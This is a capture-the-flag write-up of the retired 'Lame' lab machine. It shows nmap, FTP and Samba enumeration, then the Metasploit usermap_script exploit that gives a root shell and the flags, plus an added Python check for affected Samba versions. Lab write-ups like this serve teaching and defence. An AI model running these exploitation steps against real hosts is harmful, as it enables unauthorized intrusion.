Scanning and Enumerating
As usual, let’s start with nmap:
$ nmap -sC -sV -oA lame 10.10.10.3 👀
Since this can sometimes take a while, and because it’s important to document, I save the output to a file:
$ cat ~/Documents/nmap/lame.nmap
Trying Anonymous FTP
I tried logging in to FTP anonymously. The ftp package wasn’t installed so I had to install it:
$ apt install ftp
I was then able to log in successfully with the username anonymous and the password password.
$ ftp 10.10.10.3
Once in, I listed the contents:
$ ls -la
It doesn’t look promising because there are no files or directories listed.
Moving on to Samba
In the nmap scan I didn’t get an actual Samba version so I had to do a bit more enumeration on Samba specifically. I’ve never really messed with Samba so I Googled: ‘site: kali.org samba’ and found two tools: SMBMap and enum4linux. SMBMap didn’t give me any version numbers, so I tried:
$ enum4linux 10.10.10.3
and boom, lame server (Samba 3.0.20-Debian) was in the results:
Now we can look for a Samba 3.0.20 exploit:
$ searchsploit samba 3.0.20
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Com | exploits/unix/remote/16320.rb
and a heap overflow exploit. ‘Username map script’ is a command execution attack, and that sounds more straightforward than a heap overflow, so I tried it first.
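As an added example (not part of the original write-up), here is a small Python check that takes the banner enum4linux reported and tests the Samba version against the range searchsploit printed. It treats the "rc" suffix as a pre-release so that 3.0.25rc3 sorts before 3.0.25, which a plain string comparison gets wrong; the banner and range strings are the ones shown above, the function names are my own.

```python
import re
from typing import Tuple

# Banner string as printed by enum4linux for this host (from the write-up).
ENUM4LINUX_BANNER = "lame server (Samba 3.0.20-Debian)"

# Range printed by searchsploit: affected if 3.0.20 <= version < 3.0.25rc3
AFFECTED_FROM = "3.0.20"
FIXED_IN = "3.0.25rc3"


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '3.0.25rc3' or '3.0.20-Debian' into a comparable tuple.

    Numeric parts compare naturally. A release-candidate suffix sorts
    before the final release of the same number (3.0.25rc3 < 3.0.25),
    and distribution suffixes such as '-Debian' are ignored.
    """
    m = re.match(r"(\d+(?:\.\d+)*)(?:rc(\d+))?", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))          # pad to major.minor.patch
    if m.group(2) is None:
        return nums + (1, 0)                # final release
    return nums + (0, int(m.group(2)))      # rc sorts below the final


def samba_version(banner: str) -> str:
    """Extract the version token after 'Samba' from an enum4linux banner."""
    m = re.search(r"Samba\s+([0-9][^\s)]*)", banner)
    if not m:
        raise ValueError(f"no Samba version in {banner!r}")
    return m.group(1)


def is_affected(version: str, low: str = AFFECTED_FROM,
                fixed: str = FIXED_IN) -> bool:
    """True if low <= version < fixed, i.e. the build still needs patching."""
    return parse_version(low) <= parse_version(version) < parse_version(fixed)


if __name__ == "__main__":
    ver = samba_version(ENUM4LINUX_BANNER)
    state = "AFFECTED, patch it" if is_affected(ver) else "not in range"
    print(f"Samba {ver}: {state}")
```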
Exploiting Samba with Metasploit
I tried the usual way of using an exploit with Metasploit:
$ cp /usr/share/exploitdb/exploits/unix/remote/16320.rb /root/.msf4/modules/exploits/unix/remote
Then I fired up Metasploit and ran the exploit:
$ msfconsole
msf5 > use exploit/unix/remote/16320.rb
msf5 > set RHOST 10.10.10.3
msf5 > exploit
I was able to use the exploit, but I kept getting an error. 😕
Exploit failed: NameError undefined local variable or method `connect' for #<Msf:0x00005626cbd4fb50>
After a couple of tries I searched for an exploit in msf:
msf5 > search samba 3.0.20
It looks like Searchsploit had the wrong path; in Metasploit it’s at exploit/multi/samba/usermap_script.
So I tried again:
msf5 > use exploit/multi/samba/usermap_script
msf5 > set RHOST 10.10.10.3
msf5 > exploit
And we have a successful ecploiy, I mean, exploit. \o/
Capture the Flags
$ whoami
I’m root, nice.
Change to the root directory:
$ cd /root
and there is the root flag.
Get the flag:
$ cat root.txt
Now let’s see if we can easily find that user flag:
$ find / -name user.txt
That was simple:
Get the flag:
$ cat /home/makis/user.txt
- Sometimes the most obvious possible vulnerability isn't the best route. Enumerate more.
- Update your server software to avoid being vulnerable to easily exploitable bugs.